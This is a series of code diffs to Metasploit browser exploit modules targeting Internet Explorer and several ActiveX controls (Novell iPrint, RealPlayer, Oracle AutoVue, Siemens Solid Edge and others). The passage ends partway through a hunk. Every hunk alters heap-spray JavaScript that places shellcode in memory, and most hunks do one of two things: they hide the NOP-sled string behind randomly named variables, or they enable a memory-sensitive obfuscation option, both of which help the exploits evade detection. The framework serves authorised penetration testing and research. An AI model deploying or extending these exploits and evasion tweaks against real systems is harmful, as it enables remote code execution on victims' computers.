       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
 
     end
 

--- a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
+++ b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
@@ -86,12 +86,14 @@ class MetasploitModule < Msf::Exploit::Remote
   def heap_spray(my_target, p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = %Q|
 
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

--- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
+++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
@@ -126,7 +126,7 @@ for (var i=1; i < 0x300; i++) {
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js
@@ -245,7 +245,7 @@ function exploit(){
 
     if datastore['OBFUSCATE']
       js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger)
-      js_trigger.obfuscate
+      js_trigger.obfuscate(memory_sensitive: true)
       create_rects_func = js_trigger.sym("createRects")
       exploit_func = js_trigger.sym("exploit")
     end
@@ -332,7 +332,7 @@ function exploit(){
 
     if datastore['OBFUSCATE']
       js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger)
-      js_trigger.obfuscate
+      js_trigger.obfuscate(memory_sensitive: true)
       create_rects_func = js_trigger.sym("createRects")
       exploit_func = js_trigger.sym("exploit")
     end

--- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
+++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
@@ -104,13 +104,15 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie_heap_spray(my_target, p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     # For IE 8
     js = %Q|
 var heap_obj = new heapLib.ie(0x20000);
 var code = unescape("#{js_code}");
-var nops = unescape("#{js_nops}");
+var #{randnop} = "#{js_nops}";
+var nops = unescape(#{randnop});
 while (nops.length < 0x80000) nops += nops;
 var offset = nops.substring(0, #{my_target['Offset']});
 var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

--- a/modules/exploits/windows/browser/mswhale_checkforupdates.rb
+++ b/modules/exploits/windows/browser/mswhale_checkforupdates.rb
@@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
     js.update_opts(js_heap_spray.opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
     content = %Q|<html>
 <body>
 <script><!--

--- a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
+++ b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
@@ -342,7 +342,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     object_id = rand_text_alpha(4)

--- a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
+++ b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
@@ -196,11 +196,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_easy_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
@@ -224,13 +226,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
 
   def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
+    randnop2 = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
-    var nops_90 = unescape("#{js_90_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
+    var #{randnop2} = "#{js_90_nops}";
+    var nops_90 = unescape(#{randnop2});
     var rop_chain = unescape("#{js_rop}");
 
     while (nops.length < 0x80000) nops += nops;
@@ -288,7 +294,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     var rop = unescape("#{js_rop}");
     var code = unescape("#{js_code}");
-    var nops_90 = unescape("#{js_90_nops}");
+    var #{randnop2} = "#{js_90_nops}";
+    var nops_90 = unescape(#{randnop2});
 
     while (nops_90.length < 0x80000) nops_90 += nops_90;
 

--- a/modules/exploits/windows/browser/nis2004_antispam.rb
+++ b/modules/exploits/windows/browser/nis2004_antispam.rb
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
     js.update_opts(js_heap_spray.opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
     content = %Q|<html>
 <body>
 <script><!--

--- a/modules/exploits/windows/browser/notes_handler_cmdinject.rb
+++ b/modules/exploits/windows/browser/notes_handler_cmdinject.rb
@@ -156,7 +156,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link)
-      js_click_link.obfuscate
+      js_click_link.obfuscate(memory_sensitive: true)
       js_click_link_fn = js_click_link.sym('clickLink')
     else
       js_click_link_fn = 'clickLink'

--- a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
+++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
@@ -114,6 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     case my_target
@@ -143,7 +144,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       var heap_obj = new heapLib.ie(0x10000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_random_nops}");
+      var #{randnop} = "#{js_random_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset_length = #{my_target['Offset']};
       for (var i=0; i < 0x1000; i++) {
@@ -162,7 +164,8 @@ class MetasploitModule < Msf::Exploit::Remote
       js = %Q|
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

--- a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
+++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
@@ -180,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js

--- a/modules/exploits/windows/browser/novelliprint_callbackurl.rb
+++ b/modules/exploits/windows/browser/novelliprint_callbackurl.rb
@@ -112,11 +112,13 @@ class MetasploitModule < Msf::Exploit::Remote
     j_block      = rand_text_alpha(rand(100) + 1)
     j_memory     = rand_text_alpha(rand(100) + 1)
     j_counter    = rand_text_alpha(rand(30) + 2)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     html = %Q|<html>
 <script>
 var #{j_shellcode} = unescape('#{shellcode}');
-var #{j_nops} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{j_nops} = unescape(#{randnop});
 var #{j_headersize} = 20;
 var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};

--- a/modules/exploits/windows/browser/novelliprint_executerequest.rb
+++ b/modules/exploits/windows/browser/novelliprint_executerequest.rb
@@ -76,13 +76,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|
       <html>
       <object id='#{vname}' classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C'></object>
       <script language="JavaScript">
       var #{rand1} = unescape('#{shellcode}');
-      var #{rand2} = unescape('#{nops}');
+      var #{randnop} = "#{nops}";
+      var #{rand2} = unescape(#{randnop});
       var #{rand3} = 20;
       var #{rand4} = #{rand3} + #{rand1}.length;
       while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};

--- a/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb
+++ b/modules/exploits/windows/browser/novelliprint_executerequest_dbg.rb
@@ -111,15 +111,17 @@ class MetasploitModule < Msf::Exploit::Remote
     j_fillblock  = rand_text_alpha(rand(100) + 1)
     j_block      = rand_text_alpha(rand(100) + 1)
     j_memory     = rand_text_alpha(rand(100) + 1)
-    j_op	     = rand_text_alpha(rand(100) + 1)
-    j_dbg	     = rand_text_alpha(rand(100) + 1)
+    j_op	 = rand_text_alpha(rand(100) + 1)
+    j_dbg	 = rand_text_alpha(rand(100) + 1)
     j_counter    = rand_text_alpha(rand(30) + 2)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     html = %Q|<html>
 <object classid='clsid:#{clsid}' id='#{ienipp}'></object>
 <script>
 var #{j_shellcode} = unescape('#{shellcode}');
-var #{j_nops} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{j_nops} = unescape(#{randnop});
 var #{j_headersize} = 20;
 var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};

--- a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb
+++ b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb
@@ -79,12 +79,14 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|<html>
 <object id='#{vname}' classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C'></object>
 <script language="JavaScript">
 var #{rand1} = unescape('#{shellcode}');
-var #{rand2} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{rand2} = unescape(#{randnop});
 var #{rand3} = 20;
 var #{rand4} = #{rand3} + #{rand1}.length;
 while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};

--- a/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb
+++ b/modules/exploits/windows/browser/novelliprint_getdriversettings_2.rb
@@ -88,12 +88,14 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|<html>
 <object id='#{vname}' classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C'></object>
 <script language="JavaScript">
 var #{rand1} = unescape('#{shellcode}');
-var #{rand2} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{rand2} = unescape(#{randnop});
 var #{rand3} = 20;
 var #{rand4} = #{rand3} + #{rand1}.length;
 while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};

--- a/modules/exploits/windows/browser/ntr_activex_check_bof.rb
+++ b/modules/exploits/windows/browser/ntr_activex_check_bof.rb
@@ -158,6 +158,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Exploit writing tutorial part 11 : Heap Spraying Demystified
   # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
   def get_random_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
@@ -185,7 +186,8 @@ class MetasploitModule < Msf::Exploit::Remote
     var heap_obj = new heapLib.ie(0x10000);
 
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
@@ -207,11 +209,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 

--- a/modules/exploits/windows/browser/ntr_activex_check_bof.rb
+++ b/modules/exploits/windows/browser/ntr_activex_check_bof.rb
@@ -303,7 +303,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     # The overflow occurs after strcat'ing controlled data to

--- a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
+++ b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
@@ -78,11 +78,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 

--- a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
+++ b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
@@ -140,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     address = 0x0c0c0c0c / 0x134

--- a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
+++ b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
@@ -133,11 +133,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_easy_spray(t, js_code, js_nops, js_counter)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var counter = unescape("#{js_counter}");
 
     while (nops.length < 0x80000) nops += nops;
@@ -162,11 +164,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_aligned_spray(t, js_code, js_nops, js_counter, js_stack_pivot)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var counter = unescape("#{js_counter}");
     var stack_pivot = unescape("#{js_stack_pivot}")
 
@@ -196,6 +200,8 @@ class MetasploitModule < Msf::Exploit::Remote
   # Exploit writing tutorial part 11 : Heap Spraying Demystified
   # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
   def get_random_spray(t, js_code, js_nops, js_90_nops, js_counter, js_stack_pivot)
+    randnop = rand_text_alpha(rand(100) + 1)
+    randnop2 = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
@@ -223,8 +229,10 @@ class MetasploitModule < Msf::Exploit::Remote
     var heap_obj = new heapLib.ie(0x10000);
 
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
-    var nops_90 = unescape("#{js_90_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
+    var #{randnop2} = "#{js_90_nops}";
+    var nops_90 = unescape(#{randnop2});
     var counter = unescape("#{js_counter}");
     var stack_pivot = unescape("#{js_stack_pivot}")
 

--- a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
+++ b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
@@ -362,7 +362,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     if my_target['Rop'].nil?

--- a/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb
+++ b/modules/exploits/windows/browser/oracle_dc_submittoexpress.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
     }
     js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
     js.update_opts(js_heap_spray.opts)
-    js.obfuscate()
+    js.obfuscate(memory_sensitive: true)
     content = %Q|
       <html>
       <body>

--- a/modules/exploits/windows/browser/pcvue_func.rb
+++ b/modules/exploits/windows/browser/pcvue_func.rb
@@ -127,7 +127,7 @@ EOS
     #JS obfuscation on demand
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
       main_sym = js.sym('main')
     else
       main_sym = "main"

--- a/modules/exploits/windows/browser/pcvue_func.rb
+++ b/modules/exploits/windows/browser/pcvue_func.rb
@@ -96,11 +96,13 @@ class MetasploitModule < Msf::Exploit::Remote
     j_block      = rand_text_alpha(rand(100) + 1)
     j_memory     = rand_text_alpha(rand(100) + 1)
     j_counter    = rand_text_alpha(rand(30) + 2)
-    j_txt	     = rand_text_alpha(rand(8) + 4)
+    j_txt        = rand_text_alpha(rand(8) + 4)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     js = <<-EOS
 var #{j_shellcode} = unescape('#{shellcode}');
-var #{j_nops} = unescape("#{nops}");
+var #{randnop} = "#{nops}";
+var #{j_nops} = unescape(#{randnop});
 var #{j_headersize} = 20;
 var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
 while(#{j_nops}.length < #{j_slackspace}) {

--- a/modules/exploits/windows/browser/quickr_qp2_bof.rb
+++ b/modules/exploits/windows/browser/quickr_qp2_bof.rb
@@ -183,7 +183,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     return js

--- a/modules/exploits/windows/browser/quickr_qp2_bof.rb
+++ b/modules/exploits/windows/browser/quickr_qp2_bof.rb
@@ -117,6 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     case my_target
@@ -146,7 +147,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       var heap_obj = new heapLib.ie(0x10000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_random_nops}");
+      var #{randnop} = "#{js_random_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset_length = #{my_target['Offset']};
       for (var i=0; i < 0x1000; i++) {
@@ -165,7 +167,8 @@ class MetasploitModule < Msf::Exploit::Remote
       js = %Q|
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);

--- a/modules/exploits/windows/browser/realplayer_cdda_uri.rb
+++ b/modules/exploits/windows/browser/realplayer_cdda_uri.rb
@@ -75,6 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
     var_nopsled   = rand_text_alpha(rand(6)+3)
     spray_func    = rand_text_alpha(rand(6)+3)
     obj_id        = rand_text_alpha(rand(6)+3)
+    randnop       = rand_text_alpha(rand(100) + 1)
     html = <<-EOS
 <html>
 <head>
@@ -82,7 +83,8 @@ class MetasploitModule < Msf::Exploit::Remote
 function #{spray_func}() {
   #{var_blocks} = new Array();
   var #{var_shellcode} = unescape("#{shellcode}");
-  var #{var_nopsled} = unescape("#{nop_sled}");
+  var #{randnop} = "#{nop_sled}";
+  var #{var_nopsled} = unescape(#{randnop});
   do { #{var_nopsled} += #{var_nopsled} } while (#{var_nopsled}.length < 8200);
     for (#{var_index}=0; #{var_index} < 19000; #{var_index}++)
       #{var_blocks}[#{var_index}] = #{var_nopsled} + #{var_shellcode};

--- a/modules/exploits/windows/browser/realplayer_console.rb
+++ b/modules/exploits/windows/browser/realplayer_console.rb
@@ -80,13 +80,15 @@ class MetasploitModule < Msf::Exploit::Remote
     j_memory     = rand_text_alpha(rand(100) + 1)
     j_counter    = rand_text_alpha(rand(30) + 2)
     j_ret        = rand_text_alpha(rand(100) + 1)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     # Build out the message
     content = %Q|<html>
 <object classid='clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93' id='#{racontrol}'></object>
 <script language='javascript'>
 #{j_shellcode} = unescape('#{shellcode}');
-#{j_nops} = unescape('#{nops}');
+#{randnop} = "#{nops}";
+#{j_nops} = unescape(#{randnop});
 #{j_headersize} = 20;
 #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};

--- a/modules/exploits/windows/browser/realplayer_qcp.rb
+++ b/modules/exploits/windows/browser/realplayer_qcp.rb
@@ -214,11 +214,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def build_spray(mytarget, code)
+    randnop = rand_text_alpha(rand(100) + 1)
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
 
     var code = unescape("#{code}");
-    var nops = unescape("#{mytarget['Nops']}");
+    var #{randnop} = "#{mytarget['Nops']}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x10000) nops += nops;
     offset = nops.substring(0, 0x7BE0);

--- a/modules/exploits/windows/browser/realplayer_qcp.rb
+++ b/modules/exploits/windows/browser/realplayer_qcp.rb
@@ -127,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Remote
     vprint_status("Obfuscating javascript...")
     if datastore['OBFUSCATE']
       spray = Rex::Exploitation::JSObfu.new(spray)
-      spray.obfuscate
+      spray.obfuscate(memory_sensitive: true)
     end
 
     vprint_status("Building html...")

--- a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
+++ b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
@@ -129,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #obfuscate on demand
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
     end
 
     bof = Rex::Text.to_unescape("\x0c" * 2048, Rex::Arch.endian(my_target.arch))

--- a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
+++ b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
@@ -104,11 +104,13 @@ class MetasploitModule < Msf::Exploit::Remote
     p = payload.encoded
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});

--- a/modules/exploits/windows/browser/samsung_security_manager_put.rb
+++ b/modules/exploits/windows/browser/samsung_security_manager_put.rb
@@ -181,7 +181,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       if datastore['OBFUSCATE']
         js_content = ::Rex::Exploitation::JSObfu.new(js_content)
-        js_content.obfuscate
+        js_content.obfuscate(memory_sensitive: true)
       end
 
     print_status("Sending javascript...")
@@ -192,9 +192,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
        js_content = ::Rex::Exploitation::JSObfu.new(js_content)
-       js_content.obfuscate
+       js_content.obfuscate(memory_sensitive: true)
        onlick = ::Rex::Exploitation::JSObfu.new(onlick)
-       onlick.obfuscate
+       onlick.obfuscate(memory_sensitive: true)
     end
 
     # we can bypass Access-Control-Allow-Origin (CORS) in all browsers using iframe since it makes a GET request

--- a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb
+++ b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb
@@ -77,13 +77,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     content = %Q|
     <html>
       <object id='#{vname}' classid='clsid:AFBBE070-7340-11D2-AA6B-00E02924C34E'></object>
       <script language="JavaScript">
         var #{rand1} = unescape('#{shellcode}');
-        var #{rand2} = unescape('#{nops}');
+        var #{randnop} = "#{nops}";
+        var #{rand2} = unescape(#{randnop});
         var #{rand3} = 20;
         var #{rand4} = #{rand3} + #{rand1}.length;
         while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};

--- a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
+++ b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
@@ -348,7 +348,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
+      js.obfuscate(memory_sensitive: true)
       @heap_spray_fn = js.sym("heap_spray")
     else
       @heap_spray_fn = "heap_spray"

--- a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
+++ b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
@@ -136,6 +136,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie9_spray(t, p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(t.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(t.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = %Q|
 
@@ -212,7 +213,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     var heap_obj = new heapLib.ie(0x10000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_random_nops}");
+    var #{randnop} = "#{js_random_nops}";
+    var nops = unescape(#{randnop});
 
     function heap_spray(jutil_base) {
       while (nops.length < 0x80000) nops += nops;
@@ -235,11 +237,13 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie8_spray(t, p)
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(t.arch))
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(t.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = %Q|
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     function rop_chain(jutil_base){
       var arr = [
@@ -310,10 +314,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie6_spray(t, p)
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(t.arch))
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(t.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = %Q|
     var heap_obj = new heapLib.ie(0x20000);
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var code = unescape("#{js_code}");
 
     function heap_spray() {

--- a/modules/exploits/windows/browser/softartisans_getdrivename.rb
+++ b/modules/exploits/windows/browser/softartisans_getdrivename.rb
@@ -77,6 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rand6  = rand_text_alpha(rand(100) + 1)
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
